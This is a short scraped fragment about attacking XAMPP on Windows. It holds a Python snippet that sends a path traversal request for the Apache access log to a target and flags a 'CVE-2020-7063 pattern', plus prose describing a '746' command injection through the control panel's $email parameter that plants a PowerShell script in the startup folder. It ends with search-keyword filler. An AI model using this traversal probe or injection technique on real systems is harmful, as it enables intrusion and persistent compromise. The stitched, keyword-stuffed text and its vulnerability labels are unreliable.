traversal = target + "/index.php?page=../../../../../../xampp/apache/logs/access.log" resp2 = requests.get(traversal) if "Apache" in resp2.text: print("[+] CVE-2020-7063 pattern detected.")
A specific exploit (nicknamed "746") targets the XAMPP Control Panel's sendFeedback() function. If the control panel is exposed remotely (via port 8080 by default), an attacker injects a command via the $email parameter, writing a PowerShell script into the startup folder. xampp for windows 746 exploit